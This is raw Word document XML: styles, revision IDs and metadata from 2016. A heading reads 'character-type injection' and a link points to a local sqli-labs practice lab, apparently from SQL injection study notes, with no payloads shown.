      <w:pStyle w:val="a3"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:rFonts w:hint="eastAsia"/>
      </w:rPr>
      <w:t>字符型注入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F3"/>
    <w:rsid w:val="00087B1D"/>
    <w:rsid w:val="000E11FD"/>
    <w:rsid w:val="00115981"/>
    <w:rsid w:val="002B69B3"/>
    <w:rsid w:val="005714D7"/>
    <w:rsid w:val="00836E60"/>
    <w:rsid w:val="0093770F"/>
    <w:rsid w:val="009B3E38"/>
    <w:rsid w:val="00A80256"/>
    <w:rsid w:val="00A957D4"/>
    <w:rsid w:val="00C31FF3"/>
    <w:rsid w:val="00EF2569"/>
    <w:rsid w:val="00F06890"/>
    <w:rsid w:val="00F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0945"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{075F41F1-DE25-4092-90AD-8559D361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4D7"/>
    <w:rPr>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="a7">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00571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2cto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72.16.19.146:8080/sqli-labs-master/Less-1/?id=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745</Words>
  <Characters>4253</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>35</Lines>
  <Paragraphs>9</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company>Microsoft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user-admin</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>李文致</cp:lastModifiedBy>
  <cp:revision>7</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2016-05-11T05:50:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2016-05-15T10:26:00Z</dcterms:modified>
</cp:coreProperties>
</file>